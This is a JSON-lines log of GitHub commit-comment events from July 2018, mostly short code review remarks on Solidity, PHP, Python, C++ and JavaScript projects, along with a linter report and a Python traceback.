{"id":"7990477961","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29767756,"position":14,"line":41,"path":"contracts/Splitter.sol","commit_id":"b2fdff5bdfc8408b8037a15bdf8dd2c567f92d45","created_at":"2018-07-19T17:08:01Z","updated_at":"2018-07-19T17:08:01Z","author_association":"NONE","body":"Such a `require` on a `view` function is overkill."}},"created_at":"2018-07-19T17:08:01Z"}
{"id":"7990482123","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29767762,"position":5,"line":28,"path":"contracts/Splitter.sol","commit_id":"b2fdff5bdfc8408b8037a15bdf8dd2c567f92d45","created_at":"2018-07-19T17:08:53Z","updated_at":"2018-07-19T17:08:53Z","author_association":"NONE","body":"Congratulations, you just made 3 `SLOAD` in a row for the same value. `SLOAD` is the second most expensive operation.\r\nHow can you save gas?"}},"created_at":"2018-07-19T17:08:53Z"}
{"id":"7990483439","type":"CommitCommentEvent","actor":{"login":"slickvoodoo"},"repo":{"name":"docker/docker.github.io"},"payload":{"comment":{"id":29767764,"position":null,"line":null,"path":null,"commit_id":"5c7e147fac27317a2abc441aae220853044d480f","created_at":"2018-07-19T17:09:10Z","updated_at":"2018-07-19T17:09:10Z","author_association":"NONE","body":"why is all this being removed???"}},"created_at":"2018-07-19T17:09:10Z"}
{"id":"7990483909","type":"CommitCommentEvent","actor":{"login":"ianyfan"},"repo":{"name":"swaywm/sway"},"payload":{"comment":{"id":29767766,"position":null,"line":null,"path":null,"commit_id":"db3a36373435a34b8d0a5fc4e90eacaa2b1dae6b","created_at":"2018-07-19T17:09:16Z","updated_at":"2018-07-19T17:09:16Z","author_association":"CONTRIBUTOR","body":"Weird. I'm happy to leave it for now though."}},"created_at":"2018-07-19T17:09:16Z"}
{"id":"7990484683","type":"CommitCommentEvent","actor":{"login":"jkotas"},"repo":{"name":"trylek/corert"},"payload":{"comment":{"id":29767767,"position":132,"line":481,"path":"src/ILCompiler.ReadyToRun/src/JitInterface/CorInfoImpl.ReadyToRun.cs","commit_id":"9d5e25baa1f121bdb9bff0f7bc2001008e3b5ef3","created_at":"2018-07-19T17:09:25Z","updated_at":"2018-07-19T17:09:25Z","author_association":"NONE","body":"Sounds fine to me. I think we will need to experiment with the different arrangements to find the sweet spot."}},"created_at":"2018-07-19T17:09:25Z"}
{"id":"7990485251","type":"CommitCommentEvent","actor":{"login":"theodelrieu"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29767768,"position":9,"line":7640,"path":"include/nlohmann/json.hpp","commit_id":"04372a8c569b8788373d7d4a655b3f40aca454f9","created_at":"2018-07-19T17:09:32Z","updated_at":"2018-07-19T17:09:32Z","author_association":"CONTRIBUTOR","body":"I'll give it a try tomorrow (on phone)"}},"created_at":"2018-07-19T17:09:32Z"}
{"id":"7990485410","type":"CommitCommentEvent","actor":{"login":"koalaman"},"repo":{"name":"koalaman/shellcheck"},"payload":{"comment":{"id":29767769,"position":null,"line":null,"path":null,"commit_id":"10edba3ab82d58fb262a6ab3cc0245c0e6372259","created_at":"2018-07-19T17:09:34Z","updated_at":"2018-07-19T17:09:34Z","author_association":"OWNER","body":"By 30% from experience from non-Haskell. I can benchmark it"}},"created_at":"2018-07-19T17:09:34Z"}
{"id":"7990489539","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29767777,"position":70,"line":54,"path":"contracts/Splitter.sol","commit_id":"aaaa66cb459d8ce34988b5c2b77863872d296942","created_at":"2018-07-19T17:10:26Z","updated_at":"2018-07-19T17:10:26Z","author_association":"NONE","body":"If the `benefactor` was a variable field, how would we know how much I (me) have?"}},"created_at":"2018-07-19T17:10:26Z"}
{"id":"7990490835","type":"CommitCommentEvent","actor":{"login":"nlohmann"},"repo":{"name":"nlohmann/json"},"payload":{"comment":{"id":29767779,"position":9,"line":7640,"path":"include/nlohmann/json.hpp","commit_id":"04372a8c569b8788373d7d4a655b3f40aca454f9","created_at":"2018-07-19T17:10:40Z","updated_at":"2018-07-19T17:10:40Z","author_association":"OWNER","body":"No worries!"}},"created_at":"2018-07-19T17:10:40Z"}
{"id":"7990491111","type":"CommitCommentEvent","actor":{"login":"tgulacsi"},"repo":{"name":"tgulacsi/g-wiki"},"payload":{"comment":{"id":29767780,"position":null,"line":null,"path":null,"commit_id":"bef9c631b05c6f5f830008a1cde8b5b5385c805a","created_at":"2018-07-19T17:10:43Z","updated_at":"2018-07-19T17:10:43Z","author_association":"OWNER","body":"I've left the GPL there, ain't that enough?"}},"created_at":"2018-07-19T17:10:43Z"}
{"id":"7990493209","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29767783,"position":null,"line":null,"path":null,"commit_id":"b2fdff5bdfc8408b8037a15bdf8dd2c567f92d45","created_at":"2018-07-19T17:11:10Z","updated_at":"2018-07-19T17:11:10Z","author_association":"NONE","body":"I think you are ready to refactor and make this Splitter a utility whereby anyone can send to any other 2."}},"created_at":"2018-07-19T17:11:10Z"}
{"id":"7990493573","type":"CommitCommentEvent","actor":{"login":"fubar"},"repo":{"name":"AuroraDAO/idex-api-docs"},"payload":{"comment":{"id":29767784,"position":null,"line":null,"path":null,"commit_id":"1601a247ae54b34ae80b65477aa741dc474a22cf","created_at":"2018-07-19T17:11:15Z","updated_at":"2018-07-19T17:11:15Z","author_association":"CONTRIBUTOR","body":"@nandubatchu We have changes planned for both APIs but I cannot give any specifics yet."}},"created_at":"2018-07-19T17:11:15Z"}
{"id":"7990498548","type":"CommitCommentEvent","actor":{"login":"Ryan229"},"repo":{"name":"valtech-nyc/brookjs"},"payload":{"comment":{"id":29767796,"position":null,"line":null,"path":null,"commit_id":"e9bd45e0b44b9706ba2066e031b7a83add555987","created_at":"2018-07-19T17:12:16Z","updated_at":"2018-07-19T17:12:16Z","author_association":"NONE","body":"paket / brookjs-cli / package.json\r\n@@ -27,7 +27,7 @@\r\n     \" eslint \" : \" ^ 5.0.1 \" ,\r\n     \" eslint-loader \" : \" ^ 2.0.0 \" ,\r\n     \" esm \" : \" ^ 3.0.8 \" ,\r\n-     \" fs-extra \" : \" ^ 6 .0.0 \" ,\r\n+     \" fs-extra \" : \" ^ 7 .0.0 \" ,\r\n     \" glob \" : \" ^ 7.1.2 \" ,\r\n     \" setang \" : \" ^ 4.0.10 \" ,\r\n     \" handlebars-loader \" : \" ^ "}},"created_at":"2018-07-19T17:12:16Z"}
{"id":"7990498747","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29767798,"position":5,"line":1110,"path":"src/server/game/Server/WorldSession.cpp","commit_id":"8a4858bdcfba5b2c9fca27869db72704af39c2e6","created_at":"2018-07-19T17:12:18Z","updated_at":"2018-07-19T17:12:18Z","author_association":"MEMBER","body":"the header for the literal wasn't included in the file, was causing nopch build failures"}},"created_at":"2018-07-19T17:12:18Z"}
{"id":"7990501134","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29767804,"position":18,"line":22,"path":"test/tests.js","commit_id":"1baa84ad9a7c19b0827d266122ce806306cb53cb","created_at":"2018-07-19T17:12:49Z","updated_at":"2018-07-19T17:12:49Z","author_association":"NONE","body":"More like `.then(() => ` Because as what you wrote stands, this assert is executed right at the moment the execution enters in `before`. To see for yourself, replace this assert with a `console.log(\"hello\")`."}},"created_at":"2018-07-19T17:12:49Z"}
{"id":"7990505157","type":"CommitCommentEvent","actor":{"login":"AnshPrakash"},"repo":{"name":"AnshPrakash/Seq2Seq"},"payload":{"comment":{"id":29767815,"position":null,"line":null,"path":null,"commit_id":"ee34764f2e39d0e9c9d7709fa3dae578894c4742","created_at":"2018-07-19T17:13:38Z","updated_at":"2018-07-19T17:13:38Z","author_association":"OWNER","body":"Restore the model"}},"created_at":"2018-07-19T17:13:38Z"}
{"id":"7990506234","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29767816,"position":18,"line":22,"path":"test/tests.js","commit_id":"1baa84ad9a7c19b0827d266122ce806306cb53cb","created_at":"2018-07-19T17:13:52Z","updated_at":"2018-07-19T17:13:52Z","author_association":"NONE","body":"Not to mention that there is no rationale to make it wait to test. This line can be the first inside `before`."}},"created_at":"2018-07-19T17:13:52Z"}
{"id":"7990507961","type":"CommitCommentEvent","actor":{"login":"scottdurow"},"repo":{"name":"scottdurow/SparkleXrm"},"payload":{"comment":{"id":29767823,"position":null,"line":null,"path":null,"commit_id":"7bb738f67f5640cdda76f9a14eafd8132b246379","created_at":"2018-07-19T17:14:14Z","updated_at":"2018-07-19T17:14:14Z","author_association":"OWNER","body":"👍 "}},"created_at":"2018-07-19T17:14:14Z"}
{"id":"7990512383","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"russHyde/polyply"},"payload":{"comment":{"id":29767831,"position":null,"line":null,"path":null,"commit_id":"effacd1b2459dbaa2d16e5e013c5a96cdc924c3f","created_at":"2018-07-19T17:15:09Z","updated_at":"2018-07-19T17:15:09Z","author_association":"NONE","body":"[tests/testthat/test_polyply_data_validity.R:9:5:](https://github.com/russHyde/polyply/blob/effacd1b2459dbaa2d16e5e013c5a96cdc924c3f/tests/testthat/test_polyply_data_validity.R#L9) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:13:5:](https://github.com/russHyde/polyply/blob/effacd1b2459dbaa2d16e5e013c5a96cdc924c3f/tests/testthat/test_polyply_data_validity.R#L13) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(list()),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:17:5:](https://github.com/russHyde/polyply/blob/effacd1b2459dbaa2d16e5e013c5a96cdc924c3f/tests/testthat/test_polyply_data_validity.R#L17) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\"Not a list\"),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:21:5:](https://github.com/russHyde/polyply/blob/effacd1b2459dbaa2d16e5e013c5a96cdc924c3f/tests/testthat/test_polyply_data_validity.R#L21) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(list(\"Not a data-frame\")),\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:25:5:](https://github.com/russHyde/polyply/blob/effacd1b2459dbaa2d16e5e013c5a96cdc924c3f/tests/testthat/test_polyply_data_validity.R#L25) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:31:5:](https://github.com/russHyde/polyply/blob/effacd1b2459dbaa2d16e5e013c5a96cdc924c3f/tests/testthat/test_polyply_data_validity.R#L31) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:37:5:](https://github.com/russHyde/polyply/blob/effacd1b2459dbaa2d16e5e013c5a96cdc924c3f/tests/testthat/test_polyply_data_validity.R#L37) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:43:5:](https://github.com/russHyde/polyply/blob/effacd1b2459dbaa2d16e5e013c5a96cdc924c3f/tests/testthat/test_polyply_data_validity.R#L43) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​    .is_nonempty_list_of_data_frames(\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_polyply_data_validity.R:50:7:](https://github.com/russHyde/polyply/blob/effacd1b2459dbaa2d16e5e013c5a96cdc924c3f/tests/testthat/test_polyply_data_validity.R#L50) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​      .is_nonempty_list_of_data_frames(\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T17:15:09Z"}
{"id":"7990523084","type":"CommitCommentEvent","actor":{"login":"crashe24"},"repo":{"name":"crashe24/udemy-heroes"},"payload":{"comment":{"id":29767863,"position":4,"line":8,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-19T17:17:21Z","updated_at":"2018-07-19T17:17:21Z","author_association":"OWNER","body":"## Dead\r\nEste es un villanito "}},"created_at":"2018-07-19T17:17:21Z"}
{"id":"7990525416","type":"CommitCommentEvent","actor":{"login":"oanthailand"},"repo":{"name":"GoogleChrome/OriginTrials"},"payload":{"comment":{"id":29767868,"position":null,"line":null,"path":null,"commit_id":"476dff84dcaad2b27d8faa68003f234572fcfcba","created_at":"2018-07-19T17:17:48Z","updated_at":"2018-07-19T17:17:48Z","author_association":"NONE","body":"476dff8"}},"created_at":"2018-07-19T17:17:48Z"}
{"id":"7990525889","type":"CommitCommentEvent","actor":{"login":"Ryan229"},"repo":{"name":"valtech-nyc/brookjs"},"payload":{"comment":{"id":29767870,"position":2,"line":3,"path":"README.md","commit_id":"0641bca0d4215a5634e5a9614f0d5c72d835adc9","created_at":"2018-07-19T17:17:53Z","updated_at":"2018-07-19T17:17:53Z","author_association":"NONE","body":"\t[! [ Status Build ] (https://travis-ci.org/valtech-nyc/brookjs.svg?branch=master)] (https://travis-ci.org/valtech-nyc/brookjs) [! [ Maintainability ] (https://api.codeclimate.com/v1/badges/b608965a030648b33573/maintainability)] (https://codeclimate.com/github/valtech-nyc/brookjs/maintainability) [! [ Cakupan Uji ] (https: //api.codeclimate.com/v1/badges/b608965a030648b33573/test_coverage)] (https://codeclimate.com/github/valtech-nyc/brookjs/test_coverage) [! [ npm ] (https: //img.shields. io / npm / v / brookjs.svg)] (https://www.npmjs.com/package/brookjs) [! [ Greenkeeper badge ] (https://badges.greenkeeper.io/valtech-nyc/brookjs.svg )] (https://greenkeeper.io/)"}},"created_at":"2018-07-19T17:17:53Z"}
{"id":"7990531596","type":"CommitCommentEvent","actor":{"login":"ch3ric"},"repo":{"name":"JennyViannay/TESTJuillet"},"payload":{"comment":{"id":29767877,"position":42,"line":42,"path":"src/AppBundle/Controller/AstronauteController.php","commit_id":"cdf5ea1987b12afcb2ee10bf62cb1a2595ff7c33","created_at":"2018-07-19T17:19:04Z","updated_at":"2018-07-19T17:19:04Z","author_association":"NONE","body":"use doctrine paramConverter instead to get the astronaut: https://symfony.com/doc/4.0/bundles/SensioFrameworkExtraBundle/annotations/converters.html\r\n\r\nif not found, the param converter will automatically throw a 404"}},"created_at":"2018-07-19T17:19:04Z"}
{"id":"7990534101","type":"CommitCommentEvent","actor":{"login":"crashe24"},"repo":{"name":"crashe24/udemy-heroes"},"payload":{"comment":{"id":29767881,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-19T17:19:35Z","updated_at":"2018-07-19T17:19:35Z","author_association":"OWNER","body":"### Notas\r\nEntiendo tu punto de vista"}},"created_at":"2018-07-19T17:19:35Z"}
{"id":"7990534828","type":"CommitCommentEvent","actor":{"login":"ch3ric"},"repo":{"name":"JennyViannay/TESTJuillet"},"payload":{"comment":{"id":29767883,"position":73,"line":73,"path":"src/AppBundle/Controller/AstronauteController.php","commit_id":"cdf5ea1987b12afcb2ee10bf62cb1a2595ff7c33","created_at":"2018-07-19T17:19:44Z","updated_at":"2018-07-19T17:19:44Z","author_association":"NONE","body":"`else` not needed because you used `return` in previous `if` case"}},"created_at":"2018-07-19T17:19:44Z"}
{"id":"7990536432","type":"CommitCommentEvent","actor":{"login":"chilithomas"},"repo":{"name":"nccgroup/aws-inventory"},"payload":{"comment":{"id":29767886,"position":null,"line":null,"path":null,"commit_id":"9604419a2322b41683db2731064b64d2b878432d","created_at":"2018-07-19T17:20:05Z","updated_at":"2018-07-19T17:20:05Z","author_association":"NONE","body":"    if self._checker(attempts, response, caught_exception):\r\n  File \"/home/aws-inventory/venv/local/lib/python2.7/site-packages/botocore/retryhandler.py\", line 251, in __call__\r\n    caught_exception)\r\n  File \"/home/aws-inventory/venv/local/lib/python2.7/site-packages/botocore/retryhandler.py\", line 277, in _should_retry\r\n    return self._checker(attempt_number, response, caught_exception)\r\n  File \"/home/aws-inventory/venv/local/lib/python2.7/site-packages/botocore/retryhandler.py\", line 317, in __call__\r\n    caught_exception)\r\n  File \"/home/aws-inventory/venv/local/lib/python2.7/site-packages/botocore/retryhandler.py\", line 223, in __call__\r\n    attempt_number, caught_exception)\r\n  File \"/home/aws-inventory/venv/local/lib/python2.7/site-packages/botocore/retryhandler.py\", line 359, in _check_caught_exception\r\n    raise caught_exception\r\nSSLError: [Errno 24] Too many open files\r\nException in thread Thread-1:\r\nTraceback (most recent call last):\r\n  File \"/usr/lib/python2.7/threading.py\", line 801, in __bootstrap_inner\r\n    self.run()\r\n  File \"/usr/lib/python2.7/threading.py\", line 754, in run\r\n    self.__target(*self.__args, **self.__kwargs)\r\n  File \"/home/aws-inventory/aws_inventory/invoker.py\", line 100, in _probe_services\r\n    self.write_results()\r\n  File \"/home/aws-inventory/aws_inventory/invoker.py\", line 131, in write_results\r\n    self.store.generate_data_file(out_fp)\r\n  File \"/home/aws-inventory/aws_inventory/store.py\", line 138, in generate_data_file\r\n    data = build_children({'[inventory]': self._response_store})\r\n  File \"/home/aws-inventory/aws_inventory/store.py\", line 120, in build_children\r\n    child = build_children(val)\r\n  File \"/home/aws-inventory/aws_inventory/store.py\", line 120, in build_children\r\n    child = build_children(val)\r\n  File \"/home/aws-inventory/aws_inventory/store.py\", line 120, in build_children\r\n    child = build_children(val)\r\n  File \"/home/aws-inventory/aws_inventory/store.py\", line 120, in build_children\r\n    child = build_children(val)\r\n  File \"/home/aws-inventory/aws_inventory/store.py\", line 120, in build_children\r\n    child = build_children(val)\r\n  File \"/home/aws-inventory/aws_inventory/store.py\", line 128, in build_children\r\n    child = build_children(val)\r\n  File \"/home/aws-inventory/aws_inventory/store.py\", line 125, in build_children\r\n    children.append({'text': u'{} = {}'.format(key, val)})\r\nUnicodeDecodeError: 'ascii' codec can't decode byte 0x82 in position 1: ordinal not in range(128)\r\n"}},"created_at":"2018-07-19T17:20:05Z"}
{"id":"7990536603","type":"CommitCommentEvent","actor":{"login":"ch3ric"},"repo":{"name":"JennyViannay/TESTJuillet"},"payload":{"comment":{"id":29767887,"position":87,"line":87,"path":"src/AppBundle/Controller/AstronauteController.php","commit_id":"cdf5ea1987b12afcb2ee10bf62cb1a2595ff7c33","created_at":"2018-07-19T17:20:08Z","updated_at":"2018-07-19T17:20:08Z","author_association":"NONE","body":"you can use Doctrine Param converter there too, to get the astronaut to remove"}},"created_at":"2018-07-19T17:20:08Z"}
{"id":"7990540478","type":"CommitCommentEvent","actor":{"login":"ch3ric"},"repo":{"name":"JennyViannay/TESTJuillet"},"payload":{"comment":{"id":29767897,"position":1,"line":1,"path":".idea/ApiElevenLab.iml","commit_id":"cdf5ea1987b12afcb2ee10bf62cb1a2595ff7c33","created_at":"2018-07-19T17:20:54Z","updated_at":"2018-07-19T17:20:54Z","author_association":"NONE","body":"best practice: do not commit `.idea`: use global `.gitignore`"}},"created_at":"2018-07-19T17:20:54Z"}
{"id":"7990541078","type":"CommitCommentEvent","actor":{"login":"public"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29767900,"position":null,"line":null,"path":null,"commit_id":"ce4c2de3a315028fa72a8ed8fb425111856b7b81","created_at":"2018-07-19T17:21:02Z","updated_at":"2018-07-19T17:21:02Z","author_association":"NONE","body":"You have no idea how much just email these commits cause for me.\n\nOn Thu, 19 Jul 2018, 18:03 David Aurelio, <notifications@github.com> wrote:\n\n> Run lint on `Yoga.cpp`/`Yoga.h`\n>\n> Summary:\n> @public\n>\n> auto-fixes formatting for `Yoga.cpp`/`Yoga.h`.\n> Submitted separately to keep other diffs cleaner.\n>\n> Reviewed By: astreet\n>\n> Differential Revision: D8868179\n>\n> fbshipit-source-id: d0667f8bb909bb5ada1263aac6e22b0a8f8875ad\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n>\n> https://github.com/facebook/react-native/commit/ce4c2de3a315028fa72a8ed8fb425111856b7b81\n>\n"}},"created_at":"2018-07-19T17:21:02Z"}
{"id":"7990544843","type":"CommitCommentEvent","actor":{"login":"ch3ric"},"repo":{"name":"JennyViannay/TESTJuillet"},"payload":{"comment":{"id":29767908,"position":90,"line":90,"path":"src/AppBundle/Controller/AstronauteController.php","commit_id":"cdf5ea1987b12afcb2ee10bf62cb1a2595ff7c33","created_at":"2018-07-19T17:21:50Z","updated_at":"2018-07-19T17:21:50Z","author_association":"NONE","body":"please follow PSR coding conventions: https://www.php-fig.org/psr/"}},"created_at":"2018-07-19T17:21:50Z"}
{"id":"7990546118","type":"CommitCommentEvent","actor":{"login":"RajeshNaga"},"repo":{"name":"RajeshNaga/DialogCycleLibPath"},"payload":{"comment":{"id":29767915,"position":null,"line":null,"path":null,"commit_id":"16a4b9d5c47c1d6d09d1c18878c15bbb120bd535","created_at":"2018-07-19T17:22:06Z","updated_at":"2018-07-19T17:22:06Z","author_association":"OWNER","body":"fdfd"}},"created_at":"2018-07-19T17:22:06Z"}
{"id":"7990547014","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29767916,"position":null,"line":null,"path":null,"commit_id":"e5263ef69f439460f2d82b4c673dad9ec6dc0567","created_at":"2018-07-19T17:22:17Z","updated_at":"2018-07-19T17:22:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fixed another issue for text not wrapping correctly](https://trello.com/c/Ka8czRfw/19-fixed-another-issue-for-text-not-wrapping-correctly)"}},"created_at":"2018-07-19T17:22:17Z"}
{"id":"7990550354","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29767927,"position":7,"line":7,"path":"bears/vcs/git/GitCommitMetadataBear.py","commit_id":"6792dab740dca8b56ba097f489005d1df1ebac26","created_at":"2018-07-19T17:23:00Z","updated_at":"2018-07-19T17:23:00Z","author_association":"NONE","body":"Import from `VCSCommitMetadataBear` instead"}},"created_at":"2018-07-19T17:23:00Z"}
{"id":"7990550684","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29767929,"position":20,"line":66,"path":"bears/vcs/git/GitCommitBear.py","commit_id":"6792dab740dca8b56ba097f489005d1df1ebac26","created_at":"2018-07-19T17:23:04Z","updated_at":"2018-07-19T17:23:04Z","author_association":"NONE","body":"We're not using `GitCommitBear` for the bear's dependency anymore now. Instead we will use `GitCommitMetadataBear` to provide the `CommitResult`. So don't change anything here ;)"}},"created_at":"2018-07-19T17:23:04Z"}
{"id":"7990551546","type":"CommitCommentEvent","actor":{"login":"mhuggins"},"repo":{"name":"nos/client"},"payload":{"comment":{"id":29767932,"position":31,"line":38,"path":"src/renderer/shared/util/sendAsset.js","commit_id":"856ff2d7dddd2b5d6e62db9940f35a38f5ec1315","created_at":"2018-07-19T17:23:16Z","updated_at":"2018-07-19T17:23:16Z","author_association":"MEMBER","body":"Nice 👍 "}},"created_at":"2018-07-19T17:23:16Z"}
{"id":"7990551778","type":"CommitCommentEvent","actor":{"login":"jrchamp"},"repo":{"name":"PHPCompatibility/PHPCompatibility"},"payload":{"comment":{"id":29767935,"position":null,"line":null,"path":null,"commit_id":"eba7501e48209d933ddb930f08830529fe6931a5","created_at":"2018-07-19T17:23:19Z","updated_at":"2018-07-19T17:23:19Z","author_association":"NONE","body":"@jrfnl It looks like this works going all the way back to PHP 4.3, but was only documented in the argument info in PHP7. I can try to submit a correction, but I've not yet had one accepted."}},"created_at":"2018-07-19T17:23:19Z"}
{"id":"7990556649","type":"CommitCommentEvent","actor":{"login":"RoyEJohnson"},"repo":{"name":"openstax/os-webview"},"payload":{"comment":{"id":29767944,"position":null,"line":null,"path":null,"commit_id":"3e07a0d03eac1f897dc3a492ecd1f3b629601464","created_at":"2018-07-19T17:24:17Z","updated_at":"2018-07-19T17:24:17Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Bug: Adoption/Interest Form Design Fixes](https://trello.com/c/4Tr1IjRn/856-bug-adoption-interest-form-design-fixes)"}},"created_at":"2018-07-19T17:24:17Z"}
{"id":"7990556794","type":"CommitCommentEvent","actor":{"login":"arijitlaik"},"repo":{"name":"underworldcode/underworld2"},"payload":{"comment":{"id":29767945,"position":null,"line":null,"path":null,"commit_id":"e7743828a4ae438f19b9e9a4a9655825944718e6","created_at":"2018-07-19T17:24:19Z","updated_at":"2018-07-19T17:24:19Z","author_association":"NONE","body":"Thanks a lot, one less sed for my logs :) "}},"created_at":"2018-07-19T17:24:19Z"}
{"id":"7990557790","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29767948,"position":1,"line":1,"path":"tests/vcs/VCSCommitMetadataBearTest.py","commit_id":"6792dab740dca8b56ba097f489005d1df1ebac26","created_at":"2018-07-19T17:24:31Z","updated_at":"2018-07-19T17:24:31Z","author_association":"NONE","body":"I think we probably want to name this file to `GitCommitMetadataBearTest` instead"}},"created_at":"2018-07-19T17:24:31Z"}
{"id":"7990559256","type":"CommitCommentEvent","actor":{"login":"refeed"},"repo":{"name":"kriti21/coala-bears"},"payload":{"comment":{"id":29767952,"position":45,"line":45,"path":"tests/vcs/VCSCommitMetadataBearTest.py","commit_id":"6792dab740dca8b56ba097f489005d1df1ebac26","created_at":"2018-07-19T17:24:48Z","updated_at":"2018-07-19T17:24:48Z","author_association":"NONE","body":"Use `GitCommitMetadataBear`"}},"created_at":"2018-07-19T17:24:48Z"}
{"id":"7990562746","type":"CommitCommentEvent","actor":{"login":"chmi3ll"},"repo":{"name":"chmi3ll/agata-chmielewska-project"},"payload":{"comment":{"id":29767957,"position":29,"line":29,"path":"src/main/java/com/crud/tasks/scheduler/EmalScheduler.java","commit_id":"94d42d403a920bde31a1786ac39ed04c7af61e04","created_at":"2018-07-19T17:25:28Z","updated_at":"2018-07-19T17:25:28Z","author_association":"OWNER","body":"przeciez dodatkowa zmienna wiele nie zdziała skoro ten podobny kod to zlozenie metody, obiektu i kilku jego parametrow.. musze ja podstawic tylko za fragment"}},"created_at":"2018-07-19T17:25:28Z"}
{"id":"7990581500","type":"CommitCommentEvent","actor":{"login":"greensopinion"},"repo":{"name":"greensopinion/node-rss-watcher"},"payload":{"comment":{"id":29767997,"position":15,"line":28,"path":"src/watcher.coffee","commit_id":"cd84ea1eaed71f32d0963a2c43668d6e704a11d0","created_at":"2018-07-19T17:29:16Z","updated_at":"2018-07-19T17:29:16Z","author_association":"OWNER","body":"should have @ prefix to reference member function"}},"created_at":"2018-07-19T17:29:16Z"}
{"id":"7990585508","type":"CommitCommentEvent","actor":{"login":"huanhuachengfeng"},"repo":{"name":"huanhuachengfeng/MFC"},"payload":{"comment":{"id":29768009,"position":null,"line":null,"path":null,"commit_id":"609c5b87cc92b108107318b39c1288a509c07ae4","created_at":"2018-07-19T17:30:06Z","updated_at":"2018-07-19T17:30:06Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-19T17:30:06Z"}
{"id":"7990591757","type":"CommitCommentEvent","actor":{"login":"cormacrelf"},"repo":{"name":"valor-software/ng2-dragula"},"payload":{"comment":{"id":29768021,"position":null,"line":null,"path":null,"commit_id":"87ad23f3a69dd678c3f23d5201ff5973f146c23a","created_at":"2018-07-19T17:31:21Z","updated_at":"2018-07-19T17:31:21Z","author_association":"COLLABORATOR","body":"Well. There is no official way to update options. But you can do it. #776."}},"created_at":"2018-07-19T17:31:21Z"}
{"id":"7990596146","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"collective/collective.ifttt"},"payload":{"comment":{"id":29768029,"position":null,"line":null,"path":null,"commit_id":"80db6c6960bdc93bd84f173b4c3807f44eb99eb5","created_at":"2018-07-19T17:32:15Z","updated_at":"2018-07-19T17:32:15Z","author_association":"COLLABORATOR","body":"@Shriyanshagro This won’t actually remove the actions from our test site with the older version.\r\n\r\nI already set visibility of the old actions to false. That does actually hide the old versions.\r\n\r\nLeaving the actions, but adding attribute remove=“true” into their main tags would remove them.\r\n\r\n"}},"created_at":"2018-07-19T17:32:15Z"}
{"id":"7990598286","type":"CommitCommentEvent","actor":{"login":"FlorianRainer"},"repo":{"name":"FlorianRainer/npgsql"},"payload":{"comment":{"id":29768033,"position":null,"line":null,"path":null,"commit_id":"52cb4aba451fa19b5520e1544e4c5de22866ac72","created_at":"2018-07-19T17:32:40Z","updated_at":"2018-07-19T17:32:40Z","author_association":"OWNER","body":"@roji you have commented on my fork, i think you wanted to comment on the main repository, right?"}},"created_at":"2018-07-19T17:32:40Z"}
